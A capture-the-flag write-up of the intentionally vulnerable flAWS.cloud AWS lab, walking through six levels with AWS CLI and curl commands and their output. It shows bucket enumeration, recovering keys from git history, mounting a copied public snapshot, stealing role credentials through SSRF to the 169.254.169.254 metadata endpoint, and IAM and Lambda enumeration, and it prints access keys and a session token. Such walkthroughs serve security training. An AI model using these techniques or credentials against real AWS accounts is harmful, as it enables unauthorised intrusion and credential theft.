flAWS.cloud

SUMMARY

flAWS.cloud is an intentionally vulnerable AWS environment made by Scott Piper designed for educational purposes. According to the author "everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud ". There are no vulnerabilities such as SQLi, XSS, etc but AWS misconfigurations and mistakes that we can abuse to solve the challenges.

A second part is available here flAWS2.cloud.

KEYWORDS

AWS, S3 bucket enumeration, IAM, EC2, lambda function enumeration.

REFERENCES

https://flaws.cloud/

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#enumerating-the-bucket

https://tcm-sec.com/unearthing-secrets-in-git-logs/

https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/

LEVEL 1

We are prompted to find the first sub-domain by enumerating buckets.

Start with DNS enumeration on the domain name.

> host flaws.cloud
flaws.cloud has address 52.218.253.114
flaws.cloud has address 52.92.128.35
flaws.cloud has address 52.92.206.139
flaws.cloud has address 52.218.233.122
flaws.cloud has address 52.218.220.250
flaws.cloud has address 52.218.221.34
flaws.cloud has address 52.218.169.202
flaws.cloud has address 52.92.147.203

And with lookup on the discovered IP addresses. We find out the site is hosted in an AWS S3 bucket and the region is us-west-2

> for ip in $(host flaws.cloud | grep address | awk -F " " '{print $4}'); do nslookup $ip;done
59.240.92.52.in-addr.arpa       name = s3-website-us-west-2.amazonaws.com.
 
Authoritative answers can be found from:
130.253.218.52.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com.
 
Authoritative answers can be found from:
187.248.92.52.in-addr.arpa      name = s3-website-us-west-2.amazonaws.com.
 
Authoritative answers can be found from:
250.224.218.52.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com.
 
Authoritative answers can be found from:
139.212.92.52.in-addr.arpa      name = s3-website-us-west-2.amazonaws.com.
 
Authoritative answers can be found from:
** server can't find 179.138.92.52.in-addr.arpa: NXDOMAIN
 
211.251.92.52.in-addr.arpa      name = s3-website-us-west-2.amazonaws.com.
Authoritative answers can be found from:
 
34.252.218.52.in-addr.arpa      name = s3-website-us-west-2.amazonaws.com.
Authoritative answers can be found from:

We can enumerate the bucket without credentials with AWS command line tool.

> aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2
2017-03-14 03:00:38       2575 hint1.html
2017-03-03 04:05:17       1707 hint2.html
2017-03-03 04:05:11       1101 hint3.html
2024-02-22 02:32:41       2861 index.html
2018-07-10 17:47:16      15979 logo.png
2017-02-27 01:59:28         46 robots.txt
2017-02-27 01:59:30       1051 secret-dd02c7c.html

Or with curl using the endpoint full URL.

> curl -v flaws.cloud.s3-us-west-2.amazonaws.com
*   Trying 52.92.145.82:80...
* Connected to flaws.cloud.s3-us-west-2.amazonaws.com (52.92.145.82) port 80 (#0)
> GET / HTTP/1.1
> Host: flaws.cloud.s3-us-west-2.amazonaws.com
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< x-amz-id-2: PxXyUjz3LLiKl3QjhS0x1uaXtfq1TXcU1g2cnGXsuJpnw9PxGA8rGWO29RAsB/jYY/hMIB2l4x8=
< x-amz-request-id: PW5T7Y5NBFFAJCQF
< Date: Sun, 02 Feb 2025 16:07:47 GMT
< x-amz-bucket-region: us-west-2
< Content-Type: application/xml
< Transfer-Encoding: chunked
< Server: AmazonS3
<
<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>flaws.cloud</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Contents><Key>hint1.html</Key><LastModified>2017-03-14T03:00:38.000Z</LastModified><ETag>&quot;f32e6fbab70a118cf4e2dc03fd71c59d&quot;</ETag><Size>2575</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>hint2.html</Key><LastModified>2017-03-03T04:05:17.000Z</LastModified><ETag>&quot;565f14ec1dce259789eb919ead471ab9&quot;</ETag><Size>1707</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>hint3.html</Key><LastModified>2017-03-03T04:05:11.000Z</LastModified><ETag>&quot;ffe5dc34663f83aedaffa512bec04989&quot;</ETag><Size>1101</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>index.html</Key><LastModified>2024-02-22T02:32:41.000Z</LastModified><ETag>&quot;cf2618d97d3a311b9b1453a4d4e02930&quot;</ETag><Size>2861</Size><StorageClass>STANDARD</Storag* Connection #0 to host flaws.cloud.s3-us-west-2.amazonaws.com left intact
eClass></Contents><Contents><Key>logo.png</Key><LastModified>2018-07-10T16:47:16.000Z</LastModified><ETag>&quot;0623bdd28190d0583ef58379f94c2217&quot;</ETag><Size>15979</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>robots.txt</Key><LastModified>2017-02-27T01:59:28.000Z</LastModified><ETag>&quot;9e6836f2de6d6e6691c78a1902bf9156&quot;</ETag><Size>46</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>secret-dd02c7c.html</Key><LastModified>2017-02-27T01:59:30.000Z</LastModified><ETag>&quot;c5e83d744b4736664ac8375d4464ed4c&quot;</ETag><Size>1051</Size><StorageClass>STANDARD</StorageClass></Contents></ListBucketResult>

The AWS CLI command expects the bucket name without the region suffix, and the region parameter in the --region flag.

In fact, the command also works without region parameter.

> aws s3 ls s3://flaws.cloud --no-sign-request

In this case, AWS is capable of detecting the bucket location even without explicitly specifying the region. This is because it attempts to locate the bucket across multiple regions. Specifying the region explicitly ensure a faster response.

Download the secret and get the URL for the next challenge.

> aws s3 cp s3://flaws.cloud/secret-dd02c7c.html --no-sign-request --region us-west-2 secret-dd02c7c.html
download: s3://flaws.cloud/secret-dd02c7c.html to ./secret-dd02c7c.html

After completing each challenge, the author provides a brief explanation of the vulnerable misconfiguration. In this case, the S3 bucket was configured to be accessible by everyone, therefore we were able to browse it without credentials.

LEVEL 2

Navigate to level 2 URL: http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Here, we are prompted to do basically the same as before but as an authenticated AWS user. Therefore, to solve this challenge you need an AWS account.

Configure your AWS profile with your account's AWS keys and browse the same bucket, there you find the secret containing the URL for the next challenge.

> aws s3 --profile <profile name here> cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html secret-e4443fc.html

The author explains that what was done was basically to change permissions from "Everyone" to "Any AWS authenticated user", which seems to be common. Ofter, people mistakenly think it refers to any user authenticated in their account; however, it refers to anyone that uses AWS.

LEVEL 3

Navigate to level 3 URL: http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Here we are prompted to find our first AWS keys.

Let's start by listing the bucket contents.

> aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2
                           PRE .git/
2017-02-27 00:14:33     123637 authenticated_users.png
2017-02-27 00:14:34       1552 hint1.html
2017-02-27 00:14:34       1426 hint2.html
2017-02-27 00:14:35       1247 hint3.html
2017-02-27 00:14:33       1035 hint4.html
2020-05-22 19:21:10       1861 index.html
2017-02-27 00:14:33         26 robots.txt

Looks like there is a git repo, clone it with aws s3 sync

> aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD to .git/HEAD
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/description to .git/description
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/COMMIT_EDITMSG to .git/COMMIT_EDITMSG
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/pre-rebase.sample to .git/hooks/pre-rebase.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/post-update.sample to .git/hooks/post-update.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/pre-applypatch.sample to .git/hooks/pre-applypatch.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/config to .git/config
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/pre-commit.sample to .git/hooks/pre-commit.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/applypatch-msg.sample to .git/hooks/applypatch-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/commit-msg.sample to .git/hooks/commit-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/prepare-commit-msg.sample to .git/hooks/prepare-commit-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/index to .git/index
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/update.sample to .git/hooks/update.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25 to .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/logs/HEAD to .git/logs/HEAD
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/info/exclude to .git/info/exclude
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b to .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c to .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/logs/refs/heads/master to .git/logs/refs/heads/master
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df to .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/c2/aab7e03933a858d1765090928dca4013fe2526 to .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2 to .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 to .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/f2/a144957997f15729d4491f251c3615d508b16a to .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/hint2.html to ./hint2.html
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/hint1.html to ./hint1.html
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/hint4.html to ./hint4.html
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/hint3.html to ./hint3.html
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/robots.txt to ./robots.txt
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/index.html to ./index.html
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61 to .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/refs/heads/master to .git/refs/heads/master
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/76/e4934c9de40e36f09b4e5538236551529f723c to .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2 to .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c to .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png to ./authenticated_users.png

Now we can look for secrets in the commits log.

> git log -p

And with the disclosed AWS keys we configure a new profile.

> aws configure --profile flaws.cloud

And login and browse the bucket content, where we find the URLs for all the challenges.

> aws --profile flaws.cloud s3 ls

In the lessons learned the author warns about credentials hard coded in source files forgotten in old revision files.

LEVEL 4

Navigate to level 4 URL: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

We are prompted to get access to a web page running on an EC2 instance. A hint is provided: a snapshot was made on the EC2 instance shortly after Nginx was set up and started.

Since we have disclosed AWS key before, let's take the opportunity to enumerate current user.

> aws --profile flaws.cloud sts get-caller-identity
{
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}

And since the author mentions a snapshot was created, let's have a look at available snapshots.

> aws --profile flaws.cloud ec2 describe-snapshots

The output is too large, so we need to filter the output to select only the snapshots owned by the user.

> aws --profile flaws.cloud ec2 describe-snapshots --owner-id self
{
    "Snapshots": [
        {
            "Description": "",
            "Encrypted": false,
            "OwnerId": "975426262029",
            "Progress": "100%",
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "StartTime": "2017-02-28T01:35:12.000Z",
            "State": "completed",
            "VolumeId": "vol-04f1c039bc13ea950",
            "VolumeSize": 8,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "flaws backup 2017.02.27"
                }
            ],
            "StorageTier": "standard"
        }
    ]
}

Since we know from out initial enumeration the region is us-west-2, we can now create a volume in our AWS account from the snapshot.

> aws --profile <self account> ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

Next, we launch an EC2 instance in the us-west-2 region from our own account AWS dashboard. In the storage options, choose the volume you have just created and then start the instance.

Connect via SSH with your keys and mount the volume.

> sudo mount /dev/xvdb1 /mnt

Nginx settings are available at this location.

> cat /mnt/home/ubuntu/setupNginx.sh

This includes credentials that will allow you to unlock the next level.

In the lessons learned, the author reminds us to protect snapshots that contains secrets and credentials.

LEVEL 5

Navigate to level 5 URL: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Here we are prompted to disclose information via HTTP proxy.

This definitely sounds like SSRF, so let's look for ways to disclose secrets from misconfigured AWS services via SSRF.

It can be done with curl querying certain internal IP address to discover if there is an IAM role associated to the EC2 instance.

> curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/

And now check if we can steal credentials of this role.

> curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

With the stolen access key, secret access key and token we create a profile by either manually editing the ~/.aws/credentials file or just using env variables.

> export AWS_ACCESS_KEY_ID="ASIA6GG7PSQGYNHWO7N7" && \
> export AWS_SECRET_ACCESS_KEY="5EcM7Wmw+mjIATpNqP/l7D3FvMbwtNlyi8skkZqW" && \
> export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEBsaCXVzLXdlc3QtMiJIMEYCIQCeGUXM2VD6QoiQz9Op5qil15Ax1TkqaLQAmwgkCR3vgQIhAMN3hrBcINMN8xlGfbuN8DtDUfJqD9VcPhp/cbYya9nwKrIFCDQQBBoMOTc1NDI2MjYyMDI5Igw/CY0Q56xEVblCKNQqjwVnx4p4LP0QP2Yzw8kfYpQ2ElZLKpFwe484K0A3PiuzKzL/S/e8Llj0JX4K4soahHJhOy7HfbHBTS2JVFS5FPgzByN/BbVxgrHue8jOut1FKyPACtTXyYyWZCT270KrbI2kzrbY+HdsHsAc8YGMFPoSjvuHwGVrc1M+9zjwoo1+lss9qLYYqAxqkdwk/kztiT9NvBwKGWLT3v/OczkzJAbiLjoJVW1UUYnKIpKUUbxB2k5zQV01T8VROEFt98FK9xRSoEy5O50o/7xqTj83fbpoViqde7GUta2nSC/eULkrgyJcmgxlneUWO5Ku/VsPdkEk+4Uet2XzdPdSHNi1ziBfThhK15m9/RbW3ledHe13UbzhxiZSKtx6VuMwwdoqLZx9aWBaCWmrBV0bK6q1jxB/rX2erM3h434nQTCSQkHMPp6urbIHhX7mhz1Blon49fFiYqpxjdaxqsw/nZT27qU11t0yZ5CSH4Z5En/FZYqr3/SPIDTKvSMW8Kp2q0N0apEZDcuYXaUzYGPq6pf/dEtaZnQdbIEWKAU3W7tEfUEdwSrXoR6Za3qxKBLmbKHrFNpK74a5rNCGf61izGY3jebRimwwTP5MNsvNwWjE7wfC+Dd8aNiBWP5ki0RTs2B5Pqi1R3VbpJf8AZx5wF/LEB8aTmIBJ6VsmwAEIFcFTxObbsscICkFZiX+lBoUer/Ay4hDxSsE1AGoR0AX+trxM3FFyDJYR6VtPkAI6w+/jRoqvb9prEowpRin7H+cl62MbStsIwAQuCC6eMgnbh10Aj8tD9q38gQf+ijxed5T5lVqAo+OyOSEORdJP8c9Mi2njKJNpitugEJtdMiCEFXIVfBoGPbcnh5wMwjll97UjrLjMIzKib0GOrABWtav6lZPoliSO3PdY6UsoXZsMERA6gSkSPnGUOV+m8ESL1JFd0mROh0RR2m0IDF8cwgchoH4Em3uNDN/FXXOf7fCHoffhpUZ/7GuuLSyhPUrtem1+Vs3PVWVLbXzDjJW6Tu1maffpLYdwKfxJnbWPvjovs4V9dW4HpZNYCAhj+B8G3sIx2E5wqSgIYi+nsKXj1na2EnMwbI2Wp5QJwULj7CYpBfA/piwg0bVUAjjUl4="

Now you browse the level 6 bucket URL found in the git.

> aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-27 02:11:07        871 index.html

The URL is in the hidden directory.

> aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/  
2017-03-03 04:36:23       2463 hint1.html
2017-03-03 04:36:23       2080 hint2.html
2020-05-22 19:42:20       2924 index.html

In the lessons learned, the author mentions the IP 169.254.169.254 as an address to take into account in the cloud world, as it usually can be used to disclose services metadata.

LEVEL 6

Navigate to the last challenge's URL: http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

We are prompted to abuse account attached policies.

First step would be to create a profile with the AWS keys provided and enumerate the user

> aws configure --profile level 
AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]:

> aws --profile level6 sts get-caller-identity
{
    "UserId": "AIDAIRMDOSCWGLCDWOG6A",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/Level6"
}

In the output we see the user name.

With the disclosed username we enumerate the attached policies.

> aws --profile level6 iam list-attached-user-policies --user-name Level6

There are two attached policies. Let's enumerate first the list_apigateways policy.

> aws --profile level6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

It seems currently enforced version is v4, let's see what is inside this version.

> aws --profile level6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

It indicates this policy allows sending GET requests to rest API endpoints.

Let's enumerate the second attached policy MySecurityAudit

> aws --profile level6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit

Find out what version v1 of this policy allows.

> aws --profile level6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1

There are quite a lot of things allowed by this policy. For example, lambda: list * permits listing all lambda functions.

> aws --profile level6 lambda list-functions

Note: if invalid signature exception is reported when issuing this command, enable clock synchronization.

> sudo timedatectl set-ntp on

Now enumerate the lambda function /aws/lambda/Level6 policy.

> aws --profile level6 lambda get-policy --function-name Level6

This reveals the rest API gateway ID s33ppypa75.

You can get stages of this API.

> aws --profile level6 apigateway get-stages --rest-api-id s33ppypa75

The stage name is "Prod".

Lambda functions are called using the rest-API-ID, stage name, region, and resource.

https://<stage-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource>

Which we can translate to the final URL we have to visit to finish the challenge.

https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Here we are prompted to visit another URL.

> curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"

In the final lessons learned the author advises against setting overly permissions when defining policies.